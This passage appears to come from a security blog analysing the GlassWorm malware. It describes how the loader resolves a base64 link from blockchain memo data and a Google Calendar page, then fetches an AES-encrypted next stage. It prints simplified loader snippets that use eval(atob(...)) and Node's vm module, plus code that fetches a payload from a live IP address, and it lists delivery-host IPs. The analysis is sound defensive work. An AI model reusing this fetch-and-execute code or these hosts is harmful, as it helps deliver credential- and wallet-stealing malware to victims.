-->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_2a3f2b3bc2d5d10df9d89a9b548598af\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_2a3f2b3bc2d5d10df9d89a9b548598af\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\">JavaScript<\/option>\n                        <option value=\"json\" selected>JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-json\">{ &quot;link&quot;: &quot;aHR0cDovLzQ1LjMyLjE1MC4yNTEvOGdCd3hFcTRodmF1OGhydGVIUXNFUSUzRCUzRA==&quot; }<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The RPC response contains multiple transactions with memo data, but the malware only uses the first one it finds to resolve the next stage. Those memo values point to different stage-delivery hosts, including <code><kbd>45[.]32[.]150[.]251<\/kbd><\/code>, <kbd><code>45[.]32[.]151[.]157<\/code><\/kbd>, and <kbd><code>70[.]34[.]242[.]255<\/code><\/kbd>, which may suggest the infrastructure changed or rotated over time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Retrieval of the next-Stage payload<\/h3>\n\n\n\n<p>After parsing the memo JSON, the loader decodes the link field and uses it for the next request:<\/p>\n\n\n\n<p><code>http[:]\/\/45[.]32[.]150[.]251\/8gBwxEq4hvau8hrteHQsEQ%3D%3D<\/code><\/p>\n\n\n\n<p>The server responds with encoded content in the body and additional header values corresponding to secretkey and ivbase64, which are later used to decrypt the AES-encrypted executable payload before execution.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Execution<\/h3>\n\n\n\n<p>Once the payload is retrieved, the malware dynamically executes it at runtime. The execution method varies depending on simple conditions in the loader. In the analyzed sample, the malware first checks whether the recovered payload is exactly 20 characters long and, if so, it immediately decodes and executes it via <code>eval(atob(...))<\/code>. In the analyzed sample, the payload did not meet that condition and was substantially larger, suggesting that this branch could have been for an alternate payload format or fallback response that we have yet to see.<\/p>\n\n\n\n<p><br>If that condition isn\u2019t met, the malware then checks the operating system. On macOS (darwin) it still uses the direct eval path, whereas on other platforms it creates a separate execution context and runs the payload through Node.js\u2019s vm module instead, with runtime capabilities such as require, Buffer, process, console, and timer functions.<\/p>\n\n\n\n<p>A representation of that logic is shown below:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_e94a79870fe7e1fb6e696cbc6d34ba99\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_e94a79870fe7e1fb6e696cbc6d34ba99\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (Z?.length == 0x14) {\r\n  eval(atob(Z));\r\n  return;\r\n}\r\n\r\nif (O.platform() == &quot;darwin&quot;) {\r\n  let _iv = Buffer.from(K, &quot;base64&quot;);\r\n  eval(atob(Z));\r\n} else {\r\n  let d = require(&quot;vm&quot;);\r\n  let t = {\r\n    require,\r\n    Buffer,\r\n    process,\r\n    console,\r\n    setTimeout,\r\n    setImmediate,\r\n    clearTimeout,\r\n    setInterval,\r\n    clearInterval\r\n  };\r\n\r\n  d.createContext(t);\r\n  new d.Script(dynamicSource).runInContext(t);\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">Stage 1<\/h2>\n\n\n\n<p>The recovered second-stage payload shows that the initial stage is not just fetching another script. It is delivering a broader credential theft, wallet theft, persistence, and exfiltration implant.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Stage delivery of GlassWorm components through a public Google Calendar page<\/h3>\n\n\n\n<p>A clear connection between the first stage loader and the recovered payload is that the second stage keeps the same indirection pattern. It retrieves a value from a public page, decodes it, and then uses it to fetch the next payload.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_f56f5553608b3990a1ce1421f8116b25\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_f56f5553608b3990a1ce1421f8116b25\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">osAtlakAnH(\r\n  atob(&#039;aHR0cHM6Ly9jYWxlbmRhci5hcHAuZ29vZ2xlLzJOa3JjS0tqNFQ2RG40dUs2&#039;),\r\n  (err, link) =&gt; niEGcybV(atob(link), niEGcybVCall)\r\n);\r\n\r\nfunction niEGcybV(slug, callback) {\r\n  http.get(&#039;http:\/\/45.32.150.251&#039; + slug, (response) =&gt; {\r\n    callback(null, {\r\n      script: data,\r\n      iv: response.headers.ivbase64,\r\n      secretKey: response.headers.secretkey\r\n    });\r\n  });\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>Here, the payload first fetches a Google Calendar-hosted page, extracts a data-base-title attribute, decodes it, and then appends the result to <code>http[:]\/\/45[.]32[.]150[.]251<\/code>. The server response body contains the next script, while the ivbase64 and secretkey headers provide the material needed for later decryption.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Embedded persistence and local staging<\/h3>\n\n\n\n<p>At this stage, the malware also establishes persistence on the victim system. It writes files under the user&#8217;s profile directory, drops a PowerShell script, and launches a hidden startup chain using:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 